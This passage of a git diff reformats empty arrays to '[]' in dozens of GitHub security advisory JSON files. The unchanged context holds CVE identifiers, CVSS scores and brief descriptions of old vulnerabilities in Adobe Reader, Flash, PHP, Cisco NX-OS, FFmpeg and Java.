b/advisories/unreviewed/2022/05/GHSA-3w5h-vwcq-cggw/GHSA-3w5h-vwcq-cggw.json @@ -7,12 +7,8 @@ "CVE-2011-0604" ], "details": "Cross-site scripting (XSS) vulnerability in Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2011-0587.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-3x9v-m7wh-wv6x/GHSA-3x9v-m7wh-wv6x.json b/advisories/unreviewed/2022/05/GHSA-3x9v-m7wh-wv6x/GHSA-3x9v-m7wh-wv6x.json index 5b5988e433f..bb7dfe5bb7f 100644 --- a/advisories/unreviewed/2022/05/GHSA-3x9v-m7wh-wv6x/GHSA-3x9v-m7wh-wv6x.json +++ b/advisories/unreviewed/2022/05/GHSA-3x9v-m7wh-wv6x/GHSA-3x9v-m7wh-wv6x.json @@ -7,12 +7,8 @@ "CVE-2010-4697" ], "details": "Use-after-free vulnerability in the Zend engine in PHP before 5.2.15 and 5.3.x before 5.3.4 might allow context-dependent attackers to cause a denial of service (heap memory corruption) or have unspecified other impact via vectors related to use of __set, __get, __isset, and __unset methods on objects accessed by a reference.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -44,9 +40,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-42j3-546g-42hg/GHSA-42j3-546g-42hg.json b/advisories/unreviewed/2022/05/GHSA-42j3-546g-42hg/GHSA-42j3-546g-42hg.json index 23a55757eed..287d44bebfe 100644 --- a/advisories/unreviewed/2022/05/GHSA-42j3-546g-42hg/GHSA-42j3-546g-42hg.json +++ b/advisories/unreviewed/2022/05/GHSA-42j3-546g-42hg/GHSA-42j3-546g-42hg.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-432r-553m-gq3p/GHSA-432r-553m-gq3p.json b/advisories/unreviewed/2022/05/GHSA-432r-553m-gq3p/GHSA-432r-553m-gq3p.json index d5f89a3fff0..ba59e62e88e 100644 --- a/advisories/unreviewed/2022/05/GHSA-432r-553m-gq3p/GHSA-432r-553m-gq3p.json +++ b/advisories/unreviewed/2022/05/GHSA-432r-553m-gq3p/GHSA-432r-553m-gq3p.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-44c7-h9h2-wj6v/GHSA-44c7-h9h2-wj6v.json b/advisories/unreviewed/2022/05/GHSA-44c7-h9h2-wj6v/GHSA-44c7-h9h2-wj6v.json index d3e7718cefb..29e0fbf59fa 100644 --- a/advisories/unreviewed/2022/05/GHSA-44c7-h9h2-wj6v/GHSA-44c7-h9h2-wj6v.json +++ b/advisories/unreviewed/2022/05/GHSA-44c7-h9h2-wj6v/GHSA-44c7-h9h2-wj6v.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-467j-gff8-q9g7/GHSA-467j-gff8-q9g7.json b/advisories/unreviewed/2022/05/GHSA-467j-gff8-q9g7/GHSA-467j-gff8-q9g7.json index 2af97c37190..398f89a011d 100644 --- a/advisories/unreviewed/2022/05/GHSA-467j-gff8-q9g7/GHSA-467j-gff8-q9g7.json +++ b/advisories/unreviewed/2022/05/GHSA-467j-gff8-q9g7/GHSA-467j-gff8-q9g7.json @@ -7,12 +7,8 @@ "CVE-2010-3629" ], "details": "Unspecified vulnerability in Adobe Reader and Acrobat 9.x before 9.4, and 8.x before 8.2.5 on Windows and Mac OS X, allows attackers to execute arbitrary code via a crafted image, a different vulnerability than CVE-2010-3620.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-46rx-vcfq-hxc2/GHSA-46rx-vcfq-hxc2.json b/advisories/unreviewed/2022/05/GHSA-46rx-vcfq-hxc2/GHSA-46rx-vcfq-hxc2.json index 0c0dbe33bfa..32aa2bc0352 100644 --- a/advisories/unreviewed/2022/05/GHSA-46rx-vcfq-hxc2/GHSA-46rx-vcfq-hxc2.json +++ b/advisories/unreviewed/2022/05/GHSA-46rx-vcfq-hxc2/GHSA-46rx-vcfq-hxc2.json @@ -7,12 +7,8 @@ "CVE-2011-3208" ], "details": "Stack-based buffer overflow in the split_wildmats function in nntpd.c in nntpd in Cyrus IMAP Server before 2.3.17 and 2.4.x before 2.4.11 allows remote attackers to execute arbitrary code via a crafted NNTP command.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-46xq-3hp8-fm2c/GHSA-46xq-3hp8-fm2c.json b/advisories/unreviewed/2022/05/GHSA-46xq-3hp8-fm2c/GHSA-46xq-3hp8-fm2c.json index da2fa8ae438..d03aea53bc5 100644 --- a/advisories/unreviewed/2022/05/GHSA-46xq-3hp8-fm2c/GHSA-46xq-3hp8-fm2c.json +++ b/advisories/unreviewed/2022/05/GHSA-46xq-3hp8-fm2c/GHSA-46xq-3hp8-fm2c.json @@ -7,12 +7,8 @@ "CVE-2010-2162" ], "details": "Adobe Flash Player before 9.0.277.0 and 10.x before 10.1.53.64, and Adobe AIR before 2.0.2.12610, allows attackers to cause a denial of service (heap memory corruption) or possibly execute arbitrary code via vectors related to improper length calculation and the (1) STSC, (2) STSZ, and (3) STCO atoms.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-4768-g35x-83q9/GHSA-4768-g35x-83q9.json b/advisories/unreviewed/2022/05/GHSA-4768-g35x-83q9/GHSA-4768-g35x-83q9.json index db84acf74a0..22498d40dd4 100644 --- a/advisories/unreviewed/2022/05/GHSA-4768-g35x-83q9/GHSA-4768-g35x-83q9.json +++ b/advisories/unreviewed/2022/05/GHSA-4768-g35x-83q9/GHSA-4768-g35x-83q9.json @@ -7,12 +7,8 @@ "CVE-2012-2791" ], "details": "Multiple unspecified vulnerabilities in the (1) decode_band_hdr function in indeo4.c and (2) ff_ivi_decode_blocks function in ivi_common.c in libavcodec/ in FFmpeg before 0.11, and Libav 0.7.x before 0.7.7 and 0.8.x before 0.8.5, have unknown impact and attack vectors, related to the \"transform size.\"", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -56,9 +52,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-47vr-m75r-g978/GHSA-47vr-m75r-g978.json b/advisories/unreviewed/2022/05/GHSA-47vr-m75r-g978/GHSA-47vr-m75r-g978.json index 7b8bfbb5d4e..f4412ff555e 100644 --- a/advisories/unreviewed/2022/05/GHSA-47vr-m75r-g978/GHSA-47vr-m75r-g978.json +++ b/advisories/unreviewed/2022/05/GHSA-47vr-m75r-g978/GHSA-47vr-m75r-g978.json @@ -7,12 +7,8 @@ "CVE-2010-4465" ], "details": "Unspecified vulnerability in the Java Runtime Environment (JRE) in Oracle Java SE and Java for Business 6 Update 23 and earlier, 5.0 Update 27 and earlier, and 1.4.2_29 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors related to Swing. NOTE: the previous information was obtained from the February 2011 CPU. Oracle has not commented on claims from a downstream vendor that this issue is related to the lack of framework support by AWT event dispatch, and/or \"clipboard access in Applets.\"", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -104,9 +100,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-486w-m5c5-v6px/GHSA-486w-m5c5-v6px.json b/advisories/unreviewed/2022/05/GHSA-486w-m5c5-v6px/GHSA-486w-m5c5-v6px.json index 0640745ae33..2fba5d67655 100644 --- a/advisories/unreviewed/2022/05/GHSA-486w-m5c5-v6px/GHSA-486w-m5c5-v6px.json +++ b/advisories/unreviewed/2022/05/GHSA-486w-m5c5-v6px/GHSA-486w-m5c5-v6px.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-494v-jqp4-m59h/GHSA-494v-jqp4-m59h.json b/advisories/unreviewed/2022/05/GHSA-494v-jqp4-m59h/GHSA-494v-jqp4-m59h.json index 018196f0be7..e260734ce6a 100644 --- a/advisories/unreviewed/2022/05/GHSA-494v-jqp4-m59h/GHSA-494v-jqp4-m59h.json +++ b/advisories/unreviewed/2022/05/GHSA-494v-jqp4-m59h/GHSA-494v-jqp4-m59h.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-4f3f-jxwx-f7ww/GHSA-4f3f-jxwx-f7ww.json b/advisories/unreviewed/2022/05/GHSA-4f3f-jxwx-f7ww/GHSA-4f3f-jxwx-f7ww.json index 739b0b874ca..5a0ff69177f 100644 --- a/advisories/unreviewed/2022/05/GHSA-4f3f-jxwx-f7ww/GHSA-4f3f-jxwx-f7ww.json +++ b/advisories/unreviewed/2022/05/GHSA-4f3f-jxwx-f7ww/GHSA-4f3f-jxwx-f7ww.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-4f6p-cv97-w83q/GHSA-4f6p-cv97-w83q.json b/advisories/unreviewed/2022/05/GHSA-4f6p-cv97-w83q/GHSA-4f6p-cv97-w83q.json index 0dc151d1653..bee1f14cabe 100644 --- a/advisories/unreviewed/2022/05/GHSA-4f6p-cv97-w83q/GHSA-4f6p-cv97-w83q.json +++ b/advisories/unreviewed/2022/05/GHSA-4f6p-cv97-w83q/GHSA-4f6p-cv97-w83q.json @@ -7,12 +7,8 @@ "CVE-2011-2569" ], "details": "Cisco Nexus OS (aka NX-OS) 4.2 and 5.0 and Cisco Unified Computing System with software 1.4 and 2.0 do not properly restrict command-line options, which allows local users to gain privileges via unspecified vectors, aka Bug IDs CSCtf40008, CSCtg18363, CSCtr44645, CSCts10195, and CSCts10188.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -24,9 +20,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-4fm9-mmfq-qgpq/GHSA-4fm9-mmfq-qgpq.json b/advisories/unreviewed/2022/05/GHSA-4fm9-mmfq-qgpq/GHSA-4fm9-mmfq-qgpq.json index 818c41b68f2..99bfe347cd2 100644 --- a/advisories/unreviewed/2022/05/GHSA-4fm9-mmfq-qgpq/GHSA-4fm9-mmfq-qgpq.json +++ b/advisories/unreviewed/2022/05/GHSA-4fm9-mmfq-qgpq/GHSA-4fm9-mmfq-qgpq.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-4g59-c88f-q65h/GHSA-4g59-c88f-q65h.json b/advisories/unreviewed/2022/05/GHSA-4g59-c88f-q65h/GHSA-4g59-c88f-q65h.json index bcc3534c455..42f9de409f3 100644 --- a/advisories/unreviewed/2022/05/GHSA-4g59-c88f-q65h/GHSA-4g59-c88f-q65h.json +++ b/advisories/unreviewed/2022/05/GHSA-4g59-c88f-q65h/GHSA-4g59-c88f-q65h.json @@ -7,12 +7,8 @@ "CVE-2013-0993" ], "details": "WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2013-05-16-1.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -52,9 +48,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-4ggq-ghmc-h6h3/GHSA-4ggq-ghmc-h6h3.json b/advisories/unreviewed/2022/05/GHSA-4ggq-ghmc-h6h3/GHSA-4ggq-ghmc-h6h3.json index 7f1865c6712..922958fb899 100644 --- a/advisories/unreviewed/2022/05/GHSA-4ggq-ghmc-h6h3/GHSA-4ggq-ghmc-h6h3.json +++ b/advisories/unreviewed/2022/05/GHSA-4ggq-ghmc-h6h3/GHSA-4ggq-ghmc-h6h3.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-4gj4-pg9r-v8v2/GHSA-4gj4-pg9r-v8v2.json b/advisories/unreviewed/2022/05/GHSA-4gj4-pg9r-v8v2/GHSA-4gj4-pg9r-v8v2.json index f6c0b76b217..8798fde8ef3 100644 --- a/advisories/unreviewed/2022/05/GHSA-4gj4-pg9r-v8v2/GHSA-4gj4-pg9r-v8v2.json +++ b/advisories/unreviewed/2022/05/GHSA-4gj4-pg9r-v8v2/GHSA-4gj4-pg9r-v8v2.json @@ -7,12 +7,8 @@ "CVE-2010-2211" ], "details": "Adobe Reader and Acrobat 9.x before 9.3.3, and 8.x before 8.2.3 on Windows and Mac OS X, allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2010-1295, CVE-2010-2202, CVE-2010-2207, CVE-2010-2209, CVE-2010-2210, and CVE-2010-2212.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-4jvw-qg24-7qcr/GHSA-4jvw-qg24-7qcr.json b/advisories/unreviewed/2022/05/GHSA-4jvw-qg24-7qcr/GHSA-4jvw-qg24-7qcr.json index d3e80c6ad7e..f127393a149 100644 --- a/advisories/unreviewed/2022/05/GHSA-4jvw-qg24-7qcr/GHSA-4jvw-qg24-7qcr.json +++ b/advisories/unreviewed/2022/05/GHSA-4jvw-qg24-7qcr/GHSA-4jvw-qg24-7qcr.json @@ -7,12 +7,8 @@ "CVE-2010-2180" ], "details": "Adobe Flash Player before 9.0.277.0 and 10.x before 10.1.53.64, and Adobe AIR before 2.0.2.12610, allows attackers to cause a denial of service (memory corruption) or possibly execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2010-2160, CVE-2010-2165, CVE-2010-2166, CVE-2010-2171, CVE-2010-2175, CVE-2010-2176, CVE-2010-2177, CVE-2010-2178, CVE-2010-2182, CVE-2010-2184, CVE-2010-2187, and CVE-2010-2188.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-4mqc-36rx-g574/GHSA-4mqc-36rx-g574.json b/advisories/unreviewed/2022/05/GHSA-4mqc-36rx-g574/GHSA-4mqc-36rx-g574.json index 8302d8807a8..8661e9cd5ed 100644 --- a/advisories/unreviewed/2022/05/GHSA-4mqc-36rx-g574/GHSA-4mqc-36rx-g574.json +++ b/advisories/unreviewed/2022/05/GHSA-4mqc-36rx-g574/GHSA-4mqc-36rx-g574.json @@ -7,12 +7,8 @@ "CVE-2008-4819" ], "details": "Unspecified vulnerability in Adobe Flash Player 9.0.124.0 and earlier makes it easier for remote attackers to conduct DNS rebinding attacks via unknown vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -92,9 +88,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-4mr2-j3m3-44r4/GHSA-4mr2-j3m3-44r4.json b/advisories/unreviewed/2022/05/GHSA-4mr2-j3m3-44r4/GHSA-4mr2-j3m3-44r4.json index e01f34ad1dd..c787799a3db 100644 --- a/advisories/unreviewed/2022/05/GHSA-4mr2-j3m3-44r4/GHSA-4mr2-j3m3-44r4.json +++ b/advisories/unreviewed/2022/05/GHSA-4mr2-j3m3-44r4/GHSA-4mr2-j3m3-44r4.json @@ -7,12 +7,8 @@ "CVE-2010-2189" ], "details": "Adobe Flash Player before 9.0.277.0 and 10.x before 10.1.53.64, and Adobe AIR before 2.0.2.12610, when used in conjunction with VMWare Tools on a VMWare platform, allows attackers to cause a denial of service (memory corruption) or possibly execute arbitrary code via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-4pxr-mcr4-xc64/GHSA-4pxr-mcr4-xc64.json b/advisories/unreviewed/2022/05/GHSA-4pxr-mcr4-xc64/GHSA-4pxr-mcr4-xc64.json index 22adf36bc7f..280c295fd37 100644 --- a/advisories/unreviewed/2022/05/GHSA-4pxr-mcr4-xc64/GHSA-4pxr-mcr4-xc64.json +++ b/advisories/unreviewed/2022/05/GHSA-4pxr-mcr4-xc64/GHSA-4pxr-mcr4-xc64.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-4qmp-55x3-xph5/GHSA-4qmp-55x3-xph5.json b/advisories/unreviewed/2022/05/GHSA-4qmp-55x3-xph5/GHSA-4qmp-55x3-xph5.json index e59e35a00d0..d13818aed98 100644 --- a/advisories/unreviewed/2022/05/GHSA-4qmp-55x3-xph5/GHSA-4qmp-55x3-xph5.json +++ b/advisories/unreviewed/2022/05/GHSA-4qmp-55x3-xph5/GHSA-4qmp-55x3-xph5.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-4r3v-pq3f-grxr/GHSA-4r3v-pq3f-grxr.json b/advisories/unreviewed/2022/05/GHSA-4r3v-pq3f-grxr/GHSA-4r3v-pq3f-grxr.json index 1dd1108269a..f84a69fa35f 100644 --- a/advisories/unreviewed/2022/05/GHSA-4r3v-pq3f-grxr/GHSA-4r3v-pq3f-grxr.json +++ b/advisories/unreviewed/2022/05/GHSA-4r3v-pq3f-grxr/GHSA-4r3v-pq3f-grxr.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-4xrp-66qh-j274/GHSA-4xrp-66qh-j274.json b/advisories/unreviewed/2022/05/GHSA-4xrp-66qh-j274/GHSA-4xrp-66qh-j274.json index 14c03e1945a..0f441e130e9 100644 --- a/advisories/unreviewed/2022/05/GHSA-4xrp-66qh-j274/GHSA-4xrp-66qh-j274.json +++ b/advisories/unreviewed/2022/05/GHSA-4xrp-66qh-j274/GHSA-4xrp-66qh-j274.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-525f-cx6r-p4wx/GHSA-525f-cx6r-p4wx.json b/advisories/unreviewed/2022/05/GHSA-525f-cx6r-p4wx/GHSA-525f-cx6r-p4wx.json index 6fb333d3384..44f2bb2d302 100644 --- a/advisories/unreviewed/2022/05/GHSA-525f-cx6r-p4wx/GHSA-525f-cx6r-p4wx.json +++ b/advisories/unreviewed/2022/05/GHSA-525f-cx6r-p4wx/GHSA-525f-cx6r-p4wx.json @@ -7,12 +7,8 @@ "CVE-2011-0596" ], "details": "The Bitmap parsing component in 2d.dll in Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allow remote attackers to execute arbitrary code via an image with crafted (1) height and (2) width values for an RLE_8 compressed bitmap, which triggers a heap-based buffer overflow, a different vulnerability than CVE-2011-0598, CVE-2011-0599, and CVE-2011-0602.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-52r3-7vqc-4rq7/GHSA-52r3-7vqc-4rq7.json b/advisories/unreviewed/2022/05/GHSA-52r3-7vqc-4rq7/GHSA-52r3-7vqc-4rq7.json index e7e544b5ee2..fd8347edae7 100644 --- a/advisories/unreviewed/2022/05/GHSA-52r3-7vqc-4rq7/GHSA-52r3-7vqc-4rq7.json +++ b/advisories/unreviewed/2022/05/GHSA-52r3-7vqc-4rq7/GHSA-52r3-7vqc-4rq7.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-52v9-p5f4-vfvm/GHSA-52v9-p5f4-vfvm.json b/advisories/unreviewed/2022/05/GHSA-52v9-p5f4-vfvm/GHSA-52v9-p5f4-vfvm.json index 2770f378620..43fb6b092ba 100644 --- a/advisories/unreviewed/2022/05/GHSA-52v9-p5f4-vfvm/GHSA-52v9-p5f4-vfvm.json +++ b/advisories/unreviewed/2022/05/GHSA-52v9-p5f4-vfvm/GHSA-52v9-p5f4-vfvm.json @@ -7,12 +7,8 @@ "CVE-2011-0871" ], "details": "Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 6 Update 25 and earlier, 5.0 Update 29 and earlier, and 1.4.2_31 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors related to Swing.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -148,9 +144,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-5543-wp3c-2h4r/GHSA-5543-wp3c-2h4r.json b/advisories/unreviewed/2022/05/GHSA-5543-wp3c-2h4r/GHSA-5543-wp3c-2h4r.json index 54ef667e77a..3238e87e530 100644 --- a/advisories/unreviewed/2022/05/GHSA-5543-wp3c-2h4r/GHSA-5543-wp3c-2h4r.json +++ b/advisories/unreviewed/2022/05/GHSA-5543-wp3c-2h4r/GHSA-5543-wp3c-2h4r.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-55r5-2v75-cf9h/GHSA-55r5-2v75-cf9h.json b/advisories/unreviewed/2022/05/GHSA-55r5-2v75-cf9h/GHSA-55r5-2v75-cf9h.json index bc71335d6b8..b3a410196fe 100644 --- a/advisories/unreviewed/2022/05/GHSA-55r5-2v75-cf9h/GHSA-55r5-2v75-cf9h.json +++ b/advisories/unreviewed/2022/05/GHSA-55r5-2v75-cf9h/GHSA-55r5-2v75-cf9h.json @@ -7,12 +7,8 @@ "CVE-2011-0568" ], "details": "Unspecified vulnerability in Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Mac OS X allows attackers to cause a denial of service or possibly execute arbitrary code via unknown vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -36,9 +32,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-5876-f5vv-fv9w/GHSA-5876-f5vv-fv9w.json b/advisories/unreviewed/2022/05/GHSA-5876-f5vv-fv9w/GHSA-5876-f5vv-fv9w.json index e23db1e022d..2808edb9c62 100644 --- a/advisories/unreviewed/2022/05/GHSA-5876-f5vv-fv9w/GHSA-5876-f5vv-fv9w.json +++ b/advisories/unreviewed/2022/05/GHSA-5876-f5vv-fv9w/GHSA-5876-f5vv-fv9w.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -47,9 +45,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-588c-x22v-pcx6/GHSA-588c-x22v-pcx6.json b/advisories/unreviewed/2022/05/GHSA-588c-x22v-pcx6/GHSA-588c-x22v-pcx6.json index 5fb7d1bfdb8..d33e2c14db5 100644 --- a/advisories/unreviewed/2022/05/GHSA-588c-x22v-pcx6/GHSA-588c-x22v-pcx6.json +++ b/advisories/unreviewed/2022/05/GHSA-588c-x22v-pcx6/GHSA-588c-x22v-pcx6.json @@ -7,12 +7,8 @@ "CVE-2014-3261" ], "details": "Buffer overflow in the Smart Call Home implementation in Cisco NX-OS on Fabric Interconnects in Cisco Unified Computing System 1.4 before 1.4(1i), NX-OS 5.0 before 5.0(3)U2(2) on Nexus 3000 devices, NX-OS 4.1 before 4.1(2)E1(1l) on Nexus 4000 devices, NX-OS 5.x before 5.1(3)N1(1) on Nexus 5000 devices, NX-OS 5.2 before 5.2(3a) on Nexus 7000 devices, and CG-OS CG4 before CG4(2) on Connected 1000 Connected Grid Routers allows remote SMTP servers to execute arbitrary code via a crafted reply, aka Bug IDs CSCtk00695, CSCts56633, CSCts56632, CSCts56628, CSCug14405, and CSCuf61322.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-5c4m-6g7v-hq2p/GHSA-5c4m-6g7v-hq2p.json b/advisories/unreviewed/2022/05/GHSA-5c4m-6g7v-hq2p/GHSA-5c4m-6g7v-hq2p.json index 206f5c6ae9e..c6c191028ee 100644 --- a/advisories/unreviewed/2022/05/GHSA-5c4m-6g7v-hq2p/GHSA-5c4m-6g7v-hq2p.json +++ b/advisories/unreviewed/2022/05/GHSA-5c4m-6g7v-hq2p/GHSA-5c4m-6g7v-hq2p.json @@ -7,12 +7,8 @@ "CVE-2008-4813" ], "details": "Adobe Reader and Acrobat 8.1.2 and earlier, and before 7.1.1, allow remote attackers to execute arbitrary code via a crafted PDF document that (1) performs unspecified actions on a Collab object that trigger memory corruption, related to a GetCosObj method; or (2) contains a malformed PDF object that triggers memory corruption during parsing.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -100,9 +96,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-5chc-m6j7-c756/GHSA-5chc-m6j7-c756.json b/advisories/unreviewed/2022/05/GHSA-5chc-m6j7-c756/GHSA-5chc-m6j7-c756.json index 07c9ce75986..54f53d09337 100644 --- a/advisories/unreviewed/2022/05/GHSA-5chc-m6j7-c756/GHSA-5chc-m6j7-c756.json +++ b/advisories/unreviewed/2022/05/GHSA-5chc-m6j7-c756/GHSA-5chc-m6j7-c756.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-5cxg-6999-xfwq/GHSA-5cxg-6999-xfwq.json 